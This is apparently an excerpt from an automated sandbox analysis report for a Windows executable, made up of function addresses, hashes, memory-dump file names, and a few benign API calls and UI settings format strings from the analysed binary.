Instruction Fuzzy Hash: C02207338087C58AD313DF3644401B9FF54EB6AB68F9C8376DA492B2E5EA24A144DF74

Function 00007FF75803A440 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b775ec297c7a0ef90f0b345d0a5621701698172fe195a70b637b23432309817d
Instruction ID: 8045c4fdf25dc75f440c35b733f1febddccb13b3647ab1a313b1c13c27f6319d
Opcode Fuzzy Hash: b775ec297c7a0ef90f0b345d0a5621701698172fe195a70b637b23432309817d
Instruction Fuzzy Hash: A0020622B0CA9A87EA75BA21E24037AF291BF45750F9C4535CB9E162D1DF7CF4488728

Function 00007FF758042570 Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd1de4f859b1e8e877277e3800e4fe8f75224abce89ea256b5f83b15ef294463
Instruction ID: 5006a7f400ed2cec4958dd4b998722a9d93fe44e4219a6c615fbfb4e37eb1d8d
Opcode Fuzzy Hash: dd1de4f859b1e8e877277e3800e4fe8f75224abce89ea256b5f83b15ef294463
Instruction Fuzzy Hash: 8202C232F08B858BE711EB7694412AEF760FB99348F985235EE4C175A5DF38E089CB14

Function 00007FF75802C4F0 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271ac208b40993525db94cd2a00e3b964f6a58f61aef981822474f2aa3b8a116
Instruction ID: 501bf7f0b7b8dea6a675233c2ec57bcd77dec2e732d323140873610e9193a862
Opcode Fuzzy Hash: 271ac208b40993525db94cd2a00e3b964f6a58f61aef981822474f2aa3b8a116
Instruction Fuzzy Hash: 32F14723D28B8C86E212E73384421B9F250AFBF3D4F5DE722FD49315F2DB6A6185A514

Function 00007FF758041860 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aea42d648d1efee1297cac2e76774b1b3da8da5fc84393ef58cd8f751dba900
Instruction ID: 11c06114a8ffe5a3a8fe0bf85af7ffcebcbc344cc633e9880370f8862dc64650
Opcode Fuzzy Hash: 4aea42d648d1efee1297cac2e76774b1b3da8da5fc84393ef58cd8f751dba900
Instruction Fuzzy Hash: 22F1E032E08A858BE725EA7690403BEF3B1EF59348F8C4735DE4C265E5DF38A459C624

Function 00007FF75803AD80 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40a3e85c7d3ebfd2382e5bfa54b72be943a51b2bbc5a826bf2a6c0ef9774af39
Instruction ID: 6eeddb75efb1fc71e52820fec45c8f75c6ae956b62310bd8970cf8bc3e5edf9c
Opcode Fuzzy Hash: 40a3e85c7d3ebfd2382e5bfa54b72be943a51b2bbc5a826bf2a6c0ef9774af39
Instruction Fuzzy Hash: A6F1D032E08A858BE751EB36D4402BDF760EF58788F985321EE4D276E5CF38E0498B54

Function 00007FF758041280 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55bc26d36702a5209f4c94b82dd11535e7fa93ddfa6e53c9f8adbaec013d9a4
Instruction ID: bb3b1ab91eae9d60ac2d7b8c3a13830e2455d0f51c83407c674eb341570f2abd
Opcode Fuzzy Hash: a55bc26d36702a5209f4c94b82dd11535e7fa93ddfa6e53c9f8adbaec013d9a4
Instruction Fuzzy Hash: 62E1D823D18BDD86E213E63754422B9F350EFAE784F5CD722FD58325B6DB28B0958A04

Function 00007FF758032080 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcddf15a069ae56f42274af20998f5650bfb2e5999585305976179caac09cc6d
Instruction ID: 6848faaf494456903f87a41e4532ae9d3ddb32a457a45d9f753c14296db1e3d8
Opcode Fuzzy Hash: dcddf15a069ae56f42274af20998f5650bfb2e5999585305976179caac09cc6d
Instruction Fuzzy Hash: 61D1F712F28A6DC6F702A73680053BEE2509F5E344F9C8332ED1D376D6EF2DA4854164

Function 00007FF75801B9F0 Relevance: .3, Instructions: 291COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edff44cc34522df04fe0eeec2fbe611da474ec1edef5724e0459341fd071c840
Instruction ID: bb4f712b8981894ac5160eff0fc09d1d0db435e43a112f29e2bf023ee37c407e
Opcode Fuzzy Hash: edff44cc34522df04fe0eeec2fbe611da474ec1edef5724e0459341fd071c840
Instruction Fuzzy Hash: D8D1585290D6D187FB77BE3548202B9E7D4DF81B68F8C0631DE4D0A1C5EF2D690982B8

Function 00007FF758013650 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7ccc0e32edba64d687166ada179e0c3368426dbd37ff8344e34536251e4372
Instruction ID: e8fce7f5c98eb13bf30b8298c6be24d25316b575a9e2d6f1a8c53a859eb9fc2e
Opcode Fuzzy Hash: ca7ccc0e32edba64d687166ada179e0c3368426dbd37ff8344e34536251e4372
Instruction Fuzzy Hash: 34C1D672D0868687E366AB3695003BAF7A0FF05768F5D4735CB6D121E5EB3CA0488B64

Function 00007FF75802D1C0 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f97396e0319e27931d78492ccf0b9cb8279136db24d8a87a19ccee06fdeafcf3
Instruction ID: f6bf8394b40bbacdfefa93d0612b6adf8917c5da06b3fd9d08805fa9ded9c46f
Opcode Fuzzy Hash: f97396e0319e27931d78492ccf0b9cb8279136db24d8a87a19ccee06fdeafcf3
Instruction Fuzzy Hash: DF913433A1868987E751CB3AD0013B9F750FF99785F588321DE4E22695EF79F48A8704

Function 00007FF75802BBE0 Relevance: .2, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction ID: 9c025c88384d619cfb8117b2ecfdc2a6957ccd5be18ec844ef817faaf0887022
Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
Instruction Fuzzy Hash: 105108A66244B187EF10AF2AD8915BCB790E346743FD88476D65D82F91C52EC10EDF30

Function 00007FF75803A430 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33d8e5e286ad73973943c78d97e87e9be050b1fc124fcca27dfb181f44542789
Instruction ID: 1b10b14c5603eec93b232dbbe43c3b132311c02bc12c146ae6b9620b90d91062
Opcode Fuzzy Hash: 33d8e5e286ad73973943c78d97e87e9be050b1fc124fcca27dfb181f44542789
Instruction Fuzzy Hash: AF71D332F18A99AAE711DB36C4512EDF360FB49348F889631EE0C27AD5DF38A149D750

Function 00007FF75800ED60 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 538ea2ad5bd2fb4fe6d81ba0d59a8811a34a1620a173e368336fb8661de9eedc
Instruction ID: df01e2e32ef1ad139685d7199ad0fb0fd192ec56fd41805262f1286acf331fdd
Opcode Fuzzy Hash: 538ea2ad5bd2fb4fe6d81ba0d59a8811a34a1620a173e368336fb8661de9eedc
Instruction Fuzzy Hash: B8517622B18B95C7EB119F14E94477AF7A1BB44740F881430EEAE93BA0EB3CD959C354

Function 00007FF75800EB30 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f14fe6ba9eea975047793fed720076f3b2667d6a7bbb639c72a74945885e3ac
Instruction ID: 338612dc81979d855f70db4565f39d93df013b903583a79dd5ec84d66b024169
Opcode Fuzzy Hash: 8f14fe6ba9eea975047793fed720076f3b2667d6a7bbb639c72a74945885e3ac
Instruction Fuzzy Hash: 16413F7272895283EB6D8A14E661F3BEA53B780741FD89039ED8F52FD4DA3CC8458714

Function 00007FF758024760 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eec30ed38b9a1dc373ec42dd730c738dd4bacb006e68fd3199f4bf1d9e7345a0
Instruction ID: 2cac64392a0abeb3796b18f80243dbe16e6b40875d6a45e8a734d30520160883
Opcode Fuzzy Hash: eec30ed38b9a1dc373ec42dd730c738dd4bacb006e68fd3199f4bf1d9e7345a0
Instruction Fuzzy Hash: E8416C11F18EC986F5619626D0402BEF251AF6E784F9DC333ED8D227D4DB7DE48A4214

Function 00007FF7580318D0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3420e20df03badd24aaa54bd4c61b19e58e536c0e4c61f36d51288c3e30ed51
Instruction ID: faf9386e2c82d06b68dc2f976854f3b2449fd083b1be938a73bf4ec359c04670
Opcode Fuzzy Hash: a3420e20df03badd24aaa54bd4c61b19e58e536c0e4c61f36d51288c3e30ed51
Instruction Fuzzy Hash: 0851F636610A8582DB54DF2AE454B9E77A1FB8DF84F49A132DF4E03B68CF39D0598B00

Function 00007FF75800D6D0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b36c61d506bdacbf90a336c46c2d0ba0d7d2407275ca43d9c684d4c8faa04a4
Instruction ID: edf0c70dbf3c317a5eb64b0e272719f709d0d11174e485d5b47c2484751e14df
Opcode Fuzzy Hash: 1b36c61d506bdacbf90a336c46c2d0ba0d7d2407275ca43d9c684d4c8faa04a4
Instruction Fuzzy Hash: 524128B2B241F95FEA98C6665824F3D7F51D3D2742789A606FF8027D48C13C9512DBA0

Function 00007FF75800D5A0 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0473899e094508e9459fd5acf522701ec408347876bf11e5b01aa5126d90771
Instruction ID: 67e9e7819a4a6b54fb6ba72482c849ba8078ac36d82cadaef991a471ccc798f1
Opcode Fuzzy Hash: e0473899e094508e9459fd5acf522701ec408347876bf11e5b01aa5126d90771
Instruction Fuzzy Hash: 6001F9717002A287DB18CA66D4F09793350F394B82BC6213FDF4D4B681DE3C9565C720

Function 00007FF758033980 Relevance: 15.2, APIs: 1, Strings: 9, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memmove.VCRUNTIME140 ref: 00007FF758033A53

Strings

[%s][0x%08X,%d], xrefs: 00007FF758033A6F
Order=%d, xrefs: 00007FF758033B83
Width=%d, xrefs: 00007FF758033B49
RefScale=%g, xrefs: 00007FF758033AA0
UserID=%08X, xrefs: 00007FF758033B09
Weight=%.4f, xrefs: 00007FF758033B27
Column %-2d, xrefs: 00007FF758033AF1
Visible=%d, xrefs: 00007FF758033B62
Sort=%d%c, xrefs: 00007FF758033BA5

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

Similarity

API ID: memmove
String ID: Order=%d$ Sort=%d%c$ UserID=%08X$ Visible=%d$ Weight=%.4f$ Width=%d$Column %-2d$RefScale=%g$[%s][0x%08X,%d]
API String ID: 2162964266-1650977620
Opcode ID: 68450266f2cd21e246bf2f9f1218d3c5b42b3427f3058cf0a4ebf63c7b9fb405
Instruction ID: e376896f6960bde5808ca366b3a11a935be072be9ab4f1ae1e35a2585c2a7100
Opcode Fuzzy Hash: 68450266f2cd21e246bf2f9f1218d3c5b42b3427f3058cf0a4ebf63c7b9fb405
Instruction Fuzzy Hash: F781DB22B18A9642EB24AB1AD68167EF3A1EF40B84F898031DE4C476D5EF3DD449C764

Function 00007FF75800E250 Relevance: 13.6, APIs: 9, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75800E293
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75800E2AF
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75800E2C0
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75800E2DA
fread.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75800E32B
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75800E339
memset.VCRUNTIME140 ref: 00007FF75800E370
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75800E378
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF75800E38E

Memory Dump Source

Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true

Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd

